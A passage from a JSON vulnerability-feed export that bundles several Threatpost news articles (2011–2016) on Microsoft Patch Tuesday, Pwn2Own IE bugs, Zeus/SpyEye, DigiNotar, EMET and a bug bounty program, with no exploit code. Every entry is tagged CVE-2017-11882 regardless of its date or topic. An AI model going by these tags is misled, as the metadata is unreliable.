is in the middle of a personality overhaul under new CEO Satya Nadella with a vigorous focus on the cloud, and the company\u2019s [vaunted Trustworthy Computing group disbanded as a single entity](<http://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404>) and migrated into several business units inside Microsoft, Patch Tuesday may showing some signs of cracking.\n\nOutside forces aren\u2019t helping much. Zero days dominate the headlines, but affect relatively few until attacks find their way into exploit kits, turning specialized hacks into commodity danger. Google\u2019s Project Zero is the most recent conspirator undermining the value of regular patching cycles; the research team has put vendors on notice that a [90-day countdown](<http://threatpost.com/round-2-google-deadline-closes-on-pair-of-microsoft-vulnerabilities/110474>) starts the second a vulnerability is reported to Microsoft\u2014or any vendor for that matter. And once the 90 days are up, disclosure is full and angst is high.\n\n**Patch Quality in Crosshairs**\n\nInternally, since TWC in September was integrated into Microsoft\u2019s cloud and enterprise group\u2014coinciding with more than 2,100 layoffs, including several key security people\u2014eyebrows have also been raised about patch quality and timeliness. Most notably, a critical vulnerability in Microsoft\u2019s sChannel, the SSL/TLS implementation in Windows, was patched in November but within days, the patch was pulled back because of [issues with TLS negotiations](<http://threatpost.com/issues-arise-with-ms14-066-schannel-patch/109385>). It was re-issued in short order, but coincidently or not, the situation did not endear anyone to the reorg going on in Redmond.\n\nEven going into today\u2019s Patch Tuesday release, a critical [cross-site scripting vulnerability in Internet Explorer affecting Windows 7 and 8.1](<http://threatpost.com/xss-vulnerability-in-ie-could-lead-to-phishing-attacks/110854>) users that last week was made public along with proof-of-concept code, still is unpatched and Microsoft has been silent on when a fix is coming. That silence, could in part, be due to the fact that the company recently [discontinued providing users with advanced notification of patches](<http://threatpost.com/microsoft-limits-advanced-patch-notifications-to-premier-customers/110294>), making them available only to premier support customers. Perhaps, security will stop being a marketing differentiator for Microsoft.\n\n\u201cThey\u2019re not going to get rid of security, but like Apple, put it more behind the scenes,\u201d said Marc Maiffret, a longtime Windows bug-hunter and current CTO at BeyondTrust. \u201cIt\u2019s not going to be the thing they talk about most. It distracts from them being a software and technology company.\u201d\n\nMicrosoft\u2019s QA testing of patches is extensive and reportedly separate from the Microsoft Security Resource Center (MSRC) and TWC, which focuses on security research, threat modeling and risk management. Updates are tested against a variety of application and operating system environments for compatibility issues and must meet strict deadlines to be included in a timely fashion to Windows Update. Patches are also tested against third party applications, and Microsoft will insist that patch quality issues have little to do with TWC changes and more to do with advanced and changing threats.\n\n\u201cMicrosoft carefully reviews and tests each security update to ensure its quality and that it has been thoroughly evaluated for application compatibility. There are many factors that can impact the length of testing,\u201d said Chris Betz of the MSRC in a statement provided to Threatpost. \u201cOnce the update is built, it must be tested with the different operating systems and applications it affects, then localized for the different markets and languages around the world. In some instances, multiple vendors are affected by the same or similar issues, which requires a coordinated release.\u201d\n\nMicrosoft\u2019s focus on delivering a consistent schedule of patches helps users inside the enterprise and smaller organizations line up their deck chairs, do compatibility testing and control patch rollouts. These processes are finely tuned compared to a decade ago, and most organizations would not trade Patch Tuesday, say for automatic silent patching, a la Google\u2019s updates to Chrome, for example, experts said.\n\n\u201cThe bigger factor that surrounds things like Patch Tuesday is that threats have changed,\u201d Maiffret said. \u201cOrganizations like governments or anyone who is a high-value target, has a good chance of getting hit with a zero day, which Patch Tuesday has no bearing on, at least up front. That\u2019s a big part of it: security moving away from the value of one individual vulnerability.\u201d\n\n**Automatic Patching Has Its Place**\n\nMicrosoft, for its part, has not been stagnant with patching. New services such as [myBulletins](<http://threatpost.com/microsoft-mybulletins-service-customizes-patch-details/106339>) and a revamped Exploitability Index help customers make deployment decisions, while its partner programs such as Microsoft Active Protections Program give participating enterprises and vendors a head\u2019s up on vulnerability details in order to coordinate patch delivery with interdependent products.\n\n\u201cEach customer is unique with varying needs based on their technology environments. With the evolution of cloud computing, more and more customers are taking advantage of the real time updates we provide,\u201d said Betz. \u201cCustomers are also increasingly taking advantage of Microsoft Update to automatically provide updates.\u201d\n\nAttackers, however, have the luxury of being able to focus on one bug, but defenders have to look at the biggest risks to their respective environments, hoping they make the right assessments and prioritizations. And this goes well beyond Microsoft to third-party applications such as Flash, Java and others that run everywhere and have been providing attackers with much more tempting targets of late. Yet with the world primarily still running on Windows, especially in smaller organizations, patch quality still gives people pause with regard to going to an automated process.\n\n\u201cI think people would like to be in automatic mode. There\u2019s a huge value to set-it-and-forget-it, but there\u2019s still a risk involved and it\u2019s difficult for people to consume that risk not knowing what could happen,\u201d said Andrew Storms, vice president of security services at New Context, and former security executive at CloudPassage and nCircle. \u201cLarge enterprises are always slower moving to the adoption of new concepts and risk, especially with IT. The argument for the other side is what if I could cut a third of my patching costs if I don\u2019t have to patch all the time; if I were a CIO, I would be drooling.\u201d\n\nThat, of course, depends on patches that are good to go out of the box, so to speak.\n\n\u201cAny business at the scale of Google or Microsoft have so many complexities that there are going to be unforeseen interactions,\u201d said Tripwire security researcher Craig Young. \u201cThat\u2019s why enterprises test patches in a controlled environment to make sure they don\u2019t breach critical business applications before rolling them out to systems. That works. The Chrome model is probably not appropriate if you\u2019re a hospital where all your terminals need a web app interface with insurance providers and if Microsoft updates IE and the web app no longer renders properly, how would you address that situation?\u201d\n\n**Environment to Dictate Patching Styles**\n\nKatie Moussouris, a former lead security strategist at Microsoft and current chief policy officer at HackerOne, was deeply involved in the development of Microsoft\u2019s coordinated disclosure program and developing strong relationships with vulnerability researchers and brokers. She says vendors need to sharpen patch development where quality and speed go hand in hand. This takes on more relevance with the so-called Internet of Things, where embedded computers often don\u2019t have simple patching mechanisms yet play critical roles in manufacturing, health care and personal environments.\n\n\u201cPatching style is something that definitely has to evolve as what makes up the bulk of internet traffic starts changing,\u201d Moussouris said. \u201cMobile devices are difficult to patch, and are not patched on anyone\u2019s schedule. Many are not designed to be patched either; they\u2019re designed to be upgraded or thrown away in two years.\u201d\n\nMicrosoft, meanwhile, has taken steps to [make exploitation more difficult for attackers](<http://threatpost.com/ie-memory-attacks-net-zdi-125000-microsoft-bounty/110876>). The introduction of memory corruption mitigations such as ASLR and DEP into Windows and Internet Explorer have made buffer overflow vulnerabilities less of a hassle than a decade ago. Free tools such as the [Enhanced Mitigation Experience Toolkit (EMET)](<http://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619>) are often a stopgap for zero-day vulnerabilities until Microsoft can release a scheduled or out-of-band security bulletin.\n\n\u201cMicrosoft has focused on a higher level of mitigations, knowing how high to raise the bar to make exploitation really hard,\u201d Maiffret said. \u201cI hope they keep their eye on mitigations, not just EMET but also the underlying operating system.\u201d\n\nFor the time being, Microsoft won\u2019t retire Patch Tuesday and its high-paying enterprise customers likely won\u2019t let them. And in the end, Patch Tuesday is still relevant on many fronts, and the processes are still superior to many third-party patching processes.\n\n\u201cStepping back, you have to ask: \u2018What\u2019s the relevance of Microsoft vulnerabilities in attacks and exploits?'\u201d Maiffret said. \u201cMicrosoft software is still relevant and part of targeted attacks; you still see IE targeted attacks happening, but at the same time, you\u2019re seeing an increase of third-party apps in targeted attacks. That\u2019s the biggest shift. Microsoft is slightly putting security in the back seat, not doing less internally, but in visibility. That mirrors what\u2019s happening from the attackers\u2019 perspective; it\u2019s just as important to find a Flash or Java vulnerability versus a Microsoft vulnerability.\u201d\n", "cvss3": {}, "published": "2015-02-10T09:00:49", "type": "threatpost", "title": "Creaking Patch Tuesday's Viability Rests with Quality, Speed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-11T12:02:27", "id": "THREATPOST:0DD2574E8237EB5925DD5C2AC8B9A426", "href": "https://threatpost.com/creaking-patch-tuesdays-viability-rests-with-quality-speed/110941/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:57", "description": "**![Microsoft](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07073827/micro_patch_19.jpg)UPDATE \u2013 **In an unexpected turn, Microsoft\u2019s monthly Patch Tuesday security updates released today did not include patches for Internet Explorer vulnerabilities used during the Pwn2Own contest one month ago.\n\nThe popular hacker contest attracted researchers from all over who were targeting all the major browsers, as well as third-party software such as [Flash and Java](<https://threatpost.com/firefox-java-flash-all-taken-down-pwn2own-030713/>). Companies such as VUPEN and MWR Labs were able to beat locked-down versions of [IE 10 running on Windows 8](<https://threatpost.com/pwn2own-browser-exploits-getting-harder-more-expensive-find-030613/>) and Mozilla\u2019s Firefox browser, as well as Chrome running on Windows. Unlike Mozilla and Google, both of which [patched the flaws exploited during the contest within 24 hours](<https://threatpost.com/mozilla-and-google-patch-browser-flaws-used-pwn2own-030813/>), Microsoft had yet to update its browser. This has been compounded after last Thursday\u2019s advanced notification that indicated a cumulative IE update was coming today.\n\n\u201cThis puts them quite a bit behind other browsers that already patched their Pwn2Own bugs,\u201d said Andrew Storms, director of security operations at nCircle.\n\nA Microsoft representative, along with Qualys CTO Wolfgang Kandek, said the delay is likely due to regression testing and QA work necessary for patches.\n\n\u201cMicrosoft works with the security community to protect our customers against all threats and we are investigating possible issues identified by researchers during the Pwn2Own competition. We are not aware of any attacks and the issues should not affect our customers, as Pwn2Own organizers do not publicly disclose the competition\u2019s findings,\u201d said Dustin Childs, group manager, Microsoft Trustworthy Computing.\n\nToday\u2019s IE rollup addresses a pair of critical remote code execution flaws in versions 6-10 the browser. Both are use- after free vulnerabilities that exist in the way IE accesses objects in memory that have been deleted. \u201cThese vulnerabilities may corrupt memory in such a way that an attacker could execute arbitrary code in the context of a user,\u201d Microsoft said in its advisory [MS13-028](<https://technet.microsoft.com/en-us/security/bulletin/ms13-028>). Users would have to be lured to a website hosting an exploit via a phishing or spam email, Microsoft said.\n\n\u201cMS13-028 has a score of \u201c2\u201d in the Exploitability Index, indicating that the construction of an exploit for the vulnerability is not entirely straightforward and not expected within the next 30 days,\u201d Kandek said.\n\nThe IE update is one of nine bulletins released today addressing 14 vulnerabilities, a relatively light month compared to the 57 updates foisted upon users in February. One other bulletin was rated critical, another remote code execution vulnerability in Microsoft Remote Desktop Client. [MS13-029](<https://technet.microsoft.com/en-us/security/bulletin/ms13-029>) includes patches for Remote Desktop Connection 6.1 Client and Remote Desktop Connection 7.0 Client on Windows XP, Vista and Windows 7, as well as Windows Server 2003, 2008 and 2008 R2.\n\n\u201cA remote-code execution vulnerability exists when the Remote Desktop ActiveX control, mstscax.dll, attempts to access an object in memory that has been deleted. An attacker could exploit the vulnerability by convincing the user to visit a specially crafted webpage.\u201d Microsoft said in its alert. \u201cAn attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user.\u201d\n\nRoss Barrett, senior manager of security engineering at Rapid7 said that while versions 6.1 and 7 are vulnerable, version 8 is unaffected and is not yet the default.\n\n\u201cThis issue could be triggered through an RDP link in a browser or other content. A workaround would be to set the \u2018kill-bit\u2019 for these ActiveX controls, but the update actually fixes the issue, rather than disabling the RDP control,\u201d Barrett said.\n\nStorms said there are enough mitigating circumstances to make it less problematic for most businesses.\n\n\u201cThe bug does not affect the latest RDP client, version 8, which dramatically reduces the affected number of machines,\u201d Storms said. \u201cMicrosoft has released mitigation steps to disable the affected ActiveX control. Also, if your users browse with default IE settings, they will be presented with the \u2018gold bar\u2019 warning providing them with an opportunity to opt out of an attack.\u201d\n\nThe remaining seven bulletins are rated critical by Microsoft, a denial-of-service bug in Active Directory has caught experts\u2019 attention. [MS13-032](<https://technet.microsoft.com/en-us/security/bulletin/ms13-032>) could be triggered if an attacker sends a specially crafted query to the LDAP service that will consume CPU cycles and cause it to crash. The vulnerability affects Active Directory, Active Directory Application Mode (ADAM), Active Directory Lightweight Directory Service (AD LDS), and Active Directory Services on Microsoft Windows servers.\n\n\u201cIt should be high on the list for enterprise installations,\u201d Kandek said. \u201cAn attacker can shut down the domain controllers for an organization using only with a single workstation.\u201d\n\nAmong the remaining bulletins are privilege escalation vulnerabilities and an information disclosure bug:\n\n * [MS13-030](<https://technet.microsoft.com/en-us/security/bulletin/ms13-030>) is an information-disclosure vulnerability in SharePoint if an attacker knew the location of a SharePoint list and gained access with legitimate credentials.\n * [MS13-031](<https://technet.microsoft.com/en-us/security/bulletin/ms13-031>) is a privilege escalation flaw in the Windows Kernel. Exploits would require valid credentials in order to carry out an attack.\n * [MS13-033](<https://technet.microsoft.com/en-us/security/bulletin/ms13-033>) affects Windows Client/Server Runtime Subsystem in the way that the system handles objects in memory. Attackers would need valid credentials and local access to pull off an exploit.\n * [MS13-034](<http://technet.microsoft.com/en-us/security/bulletin/ms13-034>) is another privilege escalation bug, this time in Windows Defender, the Microsoft antimalware client. Successful exploits could enable an attacker to run code on an infected machine, view, change or delete data or create new accounts.\n * [MS13-035](<https://technet.microsoft.com/en-us/security/bulletin/ms13-035>) repairs a vulnerability in Microsoft HTML Sanitization Component found in Microsoft Office. An attacker would have to send a malicious Office document to pull off an attack.\n * [MS13-036](<https://technet.microsoft.com/en-us/security/bulletin/ms13-036>) patches three vulnerabilities in Kernel Mode Driver that elevates privileges for an attacker, who must have valid credentials and local access to exploit the flaws.\n\n_This article was updated to include a comment from Microsoft._\n", "cvss3": {}, "published": "2013-04-09T19:18:19", "type": "threatpost", "title": "Pwn2Own IE Vulnerabilities Missing from Microsoft Patch Tuesday Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-18T18:36:16", "id": "THREATPOST:5C60BA94DEDFC24233F8B820C7D23076", "href": "https://threatpost.com/pwn2own-ie-vulnerabilities-missing-microsoft-patch-tuesday-updates-040913/77712/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:38", "description": "[![Spyeye bot](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07064546/spyeye_bot.jpg)](<https://threatpost.com/spyeye-and-zeus-malware-married-or-living-separately-101411/>)Everyone knows that the first year of marriage can be a tough one -around three percent of them end in the first 12 months. Looks like the same can be true of malware marriages, with the union of the Zeus and SpyEye Trojan now in question.\n\nJust one year after news broke that the Zeus and SpyEye Trojan families had merged, virus experts say there\u2019s reason to question whether the union is still intact.\n\nResearchers at Microsoft and Kaspersky Lab told Threatpost that, although there\u2019s clearly evidence that code was shared between the two malware families, the rumored merger of Zeus and SpyEye never took place. In fact, the two botnets continue as separate entities, with some researchers wondering if they are even controlled by the same individuals or criminal groups.\n\nZeus and SpyEye were the two main families of botnet software, with SpyEye [playing the role of upstart competitor to the more established Zeus](<https://threatpost.com/tracker-spyeye-not-yet-zeus-stature-110910/>). For a while, the competition for online hosts was intense, with [both malware families adding features to remove the other on systems they infected](<https://threatpost.com/malware-trojan-wars-spyeye-vs-zeus-040110/>).\n\nThat rivalry seemed to end in October, 2010, when researchers observed what appeared to be a merger of the two crime kits, around the same time that the author of the Zeus botnet decided to release the malware code as an open source repository. Those reports were backed by online forum posts by the SpyEye author claiming that the Zeus source code had been turned over to him and that the two Trojans [would soon be \u201cmerged into one powerful Trojan](<http://krebsonsecurity.com/2010/10/spyeye-v-zeus-rivalry-ends-in-quiet-merger/>).\u201d\n\nBy the end of 2010, an update to the SpyEye crimeware toolkit (1.3.X) included a feature, formerly unique to the Zeus crime kit, that targeted an anti-Trojan agent developed by the firm Trusteer. The new version of SpyEye also removed a feature to remove the Zeus malware if it was found running on the affected machine, Microsoft said.\n\nDespite some early reports that a merged SpyEye/Zeus Trojan was circulating online, the promised merger never happened, beyond some basic cutting and pasting of code. In fact, subsequent reports suggested that the two malware families were [continuing down separate tracks, with Zeus adding new features not seen in the other](<https://threatpost.com/zeus-malware-not-dead-yet-new-features-being-added-030411/>).\n\nNow Microsoft says that reports of the merger may have been overblown. In a post Tuesday on the company\u2019s Threat Research and Response Blog, researchers said that they considered reports of the union to be \u201cspeculative\u201d and saw little evidence that Zeus and SpyEye were sharing code.\n\nThe company declined to discuss the specifics of its research, but stood by the statement in its blog post.\n\nDmitry Tarakanov, a researcher at Kaspersky Lab who has studied the two families said that there was a code transfer from Zeus to SpyEye in the immediate aftermath of the source code being transferred to the SpyEye author. For example, the SpyEye author grabbed a Zeus feature that allowed the malware to force Web browsers on infected systems to load malicious HTML served by the botnet, even in cases where the host had a recent version of the page in question (say, an electronic banking site) stored locally in its browser cache. \u201cSpyEye could not intercept the cached html-code,\u201d Tarakanov wrote in an e-mail. \u201cSo the author of Spyeye had seen that part of the code where Zeus replaces the cache as well and added that part of code into his own source code of SpyEye.\u201d\n\nBut there\u2019s little evidence of further consolidation of the two code bases after that, he said. \u201cWe can make a conclusion that author of SpyEye did not even try to concoct one bot squeezing all the best from two source codes,\u201d he wrote.\n\nTarakanov said he believes the original author of Zeus was interested in washing his hands of the malware industry, especially with increased attention to the Zeus malware by law enforcement. In September, 2010, more than 60 individuals were charged in the U.S. and U.K. for crimes linked to the Zeus botnet. That may have chased the bot\u2019s original author into hiding.\n\nHuman nature may explain the SpyEye author\u2019s failure to carry out a grand union of the two botnets that was originally promised. \u201cPeople tend not to change work,\u201d Tarakanov wrote. In other words: \u2018if it ain\u2019t broke, don\u2019t fix it,\u2019 as the saying goes.\n\nHowever, its harder to explain the subsequent modifications to the Zeus code, which Tarakanov said are \u201ctoo serious and notable\u201d to be the work of amateurs. While its possible that the SpyEye author would choose to keep the malware families separate, its harder to understand why new features added to Zeus weren\u2019t also added to SpyEye. \u201cA programmer really does not like to code one thing twice. So, it\u2019s hard to believe that the author of SpyEye somehow developed new features (but different) for SpyEye and for Zeus,\u201d he wrote.\n\nOne possibility is that both tools are being offered to cyber criminals simultaneously, rather than requiring any one set of customers to adapt abandon their platform of choice, or asking everyone to switch to a new, merged platform. Aviv Raff, the CTO of Seculert, said in June that his researchers had found [evidence of back-end servers that are being used to host both the Zeus and SpyEye crimeware packs](<https://threatpost.com/malware-exploit-kit-writers-merging-their-talents-062411/>). Attackers who are interested in using one or the other can have their choice of which tool they\u2019d like to use at any given time, said Raff, who expects greater convergence of crime kits like SpyEye and Zeus and Web exploit kits in the future. \n\nIts also possible that main development of Zeus has been passed to a third party now that the malware source code is available online. \u201cThe situation is too muddy and there are too many conflicting arguments,\u201d Tarakanov said. \n", "cvss3": {}, "published": "2011-10-14T17:58:10", "type": "threatpost", "title": "SpyEye and Zeus Malware: Married Or Living Separately?", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:35", "id": "THREATPOST:9C03EBE552C67EF6E62604A81CF13C1A", "href": "https://threatpost.com/spyeye-and-zeus-malware-married-or-living-separately-101411/75755/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:51", "description": "[![Windows patch](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07061430/windows_patch_3.thumbnail.jpg)](<https://threatpost.com/microsoft-releases-five-bulletins-september-patch-tuesday-091311/>)Microsoft on Tuesday released (again) the five security bulletins for its September Patch Tuesday. None of the fixes being released today is rated critical, with all five being rated important. Three of the bulletins fix flaws that could result in code execution.\n\nMicrosoft also updated the security bulletin it originally released a couple of weeks ago regarding the DigiNotar compromise, revoking trust for an additional six root certificates issued by the CA. The company removed trust for a number of certificates that were cross-signed by GTE and Entrust. Here is the list of certificates placed by Microsoft into the Untrusted Certificate Store:\n\n * DigiNotar Root CA\n * DigiNotar Root CA G2\n * DigiNotar PKIoverheid CA Overheid\n * DigiNotar PKIoverheid CA Organisatie \u2013 G2\n * DigiNotar PKIoverheid CA Overheid en Bedrijven\n * DigiNotar Root CA Issued by Entrust (2 certificates)*\n * DigiNotar Services 1024 CA Issued by Entrust*\n * Diginotar Cyber CA Issued by GTE CyberTrust (3 certificates)*\n\nThe five bulletins released by Microsoft on Tuesday include fixes for vulnerabilities in Windows, Office, Excel, Sharepoint and WINS. In an odd mistake, Microsoft on Friday accidentally made the link to the September bulletins live four days early. The page was only available for a short time before Microsoft removed it, but it was long enough for several sites to post the text of the advisories.\n", "cvss3": {}, "published": "2011-09-13T18:08:30", "type": "threatpost", "title": "Microsoft Releases Five Bulletins For September Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:47", "id": "THREATPOST:CC82779FBE47FD3E64708FE6233C3DAD", "href": "https://threatpost.com/microsoft-releases-five-bulletins-september-patch-tuesday-091311/75649/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:51", "description": "Microsoft is warning users about targeted attacks against a new vulnerability in several versions of Windows and Office that could allow an attacker to take over a user\u2019s machine. The bug, which is not yet patched, is being used as part of targeted attacks with malicious email attachments, mainly in the Middle East and Asia.\n\nIn the absence of a patch, Microsoft has released a FixIt tool for the vulnerability, which prevents exploits against the vulnerability from working. The bug affects Windows Vista, Windows Server 2008 and Microsoft Office 2003 through 2010.\n\n\u201cThe exploit requires user interaction as the attack is disguised as an email requesting potential targets to open a specially crafted Word attachment. If the attachment is opened or previewed, it attempts to exploit the vulnerability using a malformed graphics image embedded in the document. An attacker who successfully exploited the vulnerability could gain the same user rights as the logged on user,\u201d the Microsoft [advisory](<http://blogs.technet.com/b/msrc/archive/2013/11/05/microsoft-releases-security-advisory-2896666-v2.aspx>) says.\n\nThe vulnerability doesn\u2019t affect the current versions of Windows, the company said, and users who are running potentially vulnerable products can take a couple of actions in order to protect themselves. Installing the [FixIt tool](<http://technet.microsoft.com/en-us/security/advisory/2896666>) will help prevent exploitation, as will deploying the Enhanced Mitigation Experience Toolkit (EMET), which helps mitigate exploits against certain classes of bugs.\n\n\u201cThe vulnerability is a remote code execution vulnerability that exists in the way affected components handle specially crafted TIFF images. An attacker could exploit this vulnerability by convincing a user to preview or open a specially crafted email message, open a specially crafted file, or browse specially crafted web content. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights<\u2018 Microsoft officials said.\n", "cvss3": {}, "published": "2013-11-05T14:07:32", "type": "threatpost", "title": "Microsoft Warns of Targeted Attacks on Windows 0-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-11-05T19:07:32", "id": "THREATPOST:DF45F7CBB6E670440E0A14E517EA753D", "href": "https://threatpost.com/microsoft-warns-of-targeted-attacks-on-windows-0-day/102821/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:29", "description": "Microsoft last week extended the end-of-life expiration date to July 2018 on its exploit mitigation add-on, the Enhanced Mitigation Experience Toolkit (EMET). But for some time, the once-useful tool has been well on its way out to pasture.\n\nWhile EMET was never meant to be anything more than stopgap protection against exploits, attackers and white-hat researchers accelerated its demise with a number of publicized [bypass attacks](<https://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619/>). That situation, plus Microsoft\u2019s urgency to have users migrate to Windows 10 and the array of new memory mitigations included in the latest OS has brought the curtain down on EMET.\n\n\u201cIt was a stopgap. It was never supposed to be something [Microsoft] wanted people to use longterm,\u201d said Cody Pierce, director of vulnerability research at Endgame. \u201cThey want people to upgrade Windows 10; for the good of their customers, they want to transition them to Windows 10 where there are some protections baked into the operating system.\u201d\n\nForemost is Control Flow Guard, a technology built to counter memory-corruption vulnerabilities, which has been available since Visual Studio 2015 and is also built into Windows 10 and Windows 8.1. [Control Flow Guard](<https://threatpost.com/bypass-developed-for-microsoft-memory-protection-control-flow-guard/114768/>) is thought to be a primary impediment to [use-after-free attacks](<https://threatpost.com/bypass-demonstrated-for-microsoft-use-after-free-mitigation-in-ie/110570/>), which became a favorite exploit once ASLR and DEP put a damper in buffer overflow attacks.\n\n\u201cThere are a lot more compile time mitigations [in Windows 10] like Control Flow Guard, and a new Return Flow Guard feature,\u201d said Darren Kemp, security researcher with Duo Security. Kemp also pointed out that since Windows 10\u2019s mitigations are integrated into the operating system, unlike EMET, there are fewer instances where users will notice a performance hit, which was increasingly common with EMET. Also, EMET required close care when configuring it to work, otherwise it could break certain application processes.\n\n\u201cSince it\u2019s not integrated, you don\u2019t get the same type of tight coupling,\u201d Kemp said. \u201cWith a lot of stuff in EMET, you have to test the software you\u2019re applying it to, to make sure the mitigations don\u2019t cause problems. It hooks into functions and injects features. If software does non-standard things, it can cause problems with those apps.\u201d\n\nMicrosoft, meanwhile, has not had EMET on a consistent upgrade path since version 5.0 dropped in 2014. This was an abrupt change from the early days when EMET was introduced and exploits were unleashed within days of Patch Tuesday releases. In announcing the deadline extension to July 31, 2018, Microsoft\u2019s Jeffrey Sutherland acknowledged EMET\u2019s limitations against modern advanced attacks, its performance and reliability shortcomings, and urged users toward Windows 10, which makes the most of hardware virtualization to sandbox applications and links before they can harm the operating system.\n\n\u201cWith the types of threats enterprises face today, we are constantly reminded of this simple truth: modern defense against software vulnerabilities requires a modern platform,\u201d Sutherland said.\n\nThe true value of any mitigation continues to be how well it raises the cost of attacks. Pierce illustrated how advanced attackers have blown well past EMET\u2019s [menu of mitigations](<https://technet.microsoft.com/en-us/security/jj653751>) with advanced logic that automates many facets of an attack that its defenses cannot keep up with.\n\n\u201cIf you\u2019re an exploit kit writer and you acquire a zero day or develop an exploit, you have to get the most bang for your buck; and part of that is supporting a wide range of targets. If you\u2019ve got a Flash exploit, you want it to work on Firefox, Windows, Linux and more and you have to come up with ways to make it easier on you,\u201d Pierce said. \u201cA lot of the ways they\u2019ve figured out to do that bypasses a lot of these late-hook defenses like EMET. They\u2019re getting more value out of it. The types of exploit mitigations EMET provides were limited in utility due to the nature of exploitation. If you look at an exploit kit from 2010, it looks wildly different than it does now.\u201d\n\nDuo\u2019s Kemp, meanwhile, says Windows 10 is one of the hardest targets to breach today.\n\n\u201cThat\u2019s the nature of this stuff: raising the bar. If you\u2019re an attacker, do you want to invest a lot of time and energy to figure out a way around this, or are you going to go after something else?\u201d Kemp said.\n", "cvss3": {}, "published": "2016-11-07T13:50:00", "type": "threatpost", "title": "Microsoft Tears off the Band-Aid with EMET", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-11-15T14:12:29", "id": "THREATPOST:714DD68C5B32F675D9C75A67D7288B65", "href": "https://threatpost.com/microsoft-tears-off-the-band-aid-with-emet/121824/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:06", "description": "Microsoft had always rejected the possibility of a [full-scale bug bounty](<http://threatpost.com/microsofts-bug-bounty-program-and-the-law-of-unintended-consequences/101038>), relying instead on solid relationships it spent the better part of a decade fostering with researchers worldwide who submit vulnerabilities to the Microsoft Security Research Center (MSRC).\n\nYet in the past couple of years, the company has bent a bit in the other direction, instituting reward programs for researchers who develop new bypasses for exploit mitigations, or defensive techniques that can be folded into Microsoft products.\n\nThe company has already paid out several hundred thousands of dollars to researchers who have successfully [beaten exploit mitigations in Windows](<https://threatpost.com/microsoft-launches-100000-bug-bounty-program/101015>), including ASLR, DEP, SEHOP and more, as well as rewarding one researcher $200,000 for a new technique to [defend against return-oriented programming (ROP) attacks](<https://threatpost.com/vasillis-pappas-wins-200000-microsoft-blue-hat-prize-072712>).\n\nIndividual vulnerability payouts have been off the board for the most part (Microsoft did institute a [temporary bounty for Internet Explorer 11](<http://threatpost.com/researchers-nab-28k-in-microsoft-bug-bounty-program/102535>) in the summer of 2013), until today when Microsoft launched the [Microsoft Online Services Bug Bounty Program](<http://technet.microsoft.com/en-us/security/dn800983>). Bounties start at $500,and vulnerabilities in cloud-based services such as Office 365 are the first eligible in the program, Microsoft said.\n\n\u201cGenerally, bounties will be paid for significant web application vulnerabilities found in eligible online service domains,\u201d Microsoft said in a statement announcing the program, adding that researchers must also submit concise steps that will allow Microsoft engineers to reproduce the vulnerability.\n\nOnly certain domains are eligible, Microsoft said. That list includes:\n\n * portal.office.com\n * *.outlook.com (Office 365 for business email services applications, excluding any consumer \u201coutlook.com\u201d services)\n * outlook.office365.com\n * login.microsoftonline.com\n * *.sharepoint.com\n * *.lync.com\n * *.officeapps.live.com\n * www.yammer.com\n * api.yammer.com\n * adminwebservice.microsoftonline.com\n * provisioningapi.microsoftonline.com\n * graph.windows.net\n\nOnly certain vulnerability classes are eligible as well, including cross-site scripting, cross-site request forgery, insecure direct object references, injection and authentication flaws, server-side code execution, privilege escalation, security configuration issues and cross-tenant data tampering or access eligible in multitenant services, Microsoft said.\n\n\u201cThe aim of the bug bounty is to uncover significant vulnerabilities that have a direct and demonstrable impact to the security of our users and our users\u2019 data,\u201d Microsoft said.\n\nMicrosoft also listed a number of vulnerabilities that are ineligible; those include:\n\n * Missing HTTP Security Headers (such as X-FRAME-OPTIONS) or cookie security flags (such as \u201chttponly\u201d)\n * Server-side information disclosure such as IPs, server names and most stack traces\n * Bugs in the web application that only affect unsupported browsers and plugins\n * Bugs used to enumerate or confirm the existence of users or tenants\n * Bugs requiring unlikely user actions\n * URL Redirects (unless combined with another flaw to produce a more severe vulnerability)\n * Vulnerabilities in platform technologies that are not unique to the online services in question (Apache or IIS vulnerabilities, for example.)\n * \u201cCross Site Scripting\u201d bugs in SharePoint that require \u201cDesigner\u201d or higher privileges in the target\u2019s tenant.\n * Low impact CSRF bugs (such as logoff)\n * Denial of Service issues\n * Cookie replay vulnerabilities\n\nMicrosoft also made it clear that it wants researchers to shy away from denial-of-service testing or any type of automated testing of its services that could lead to significant traffic 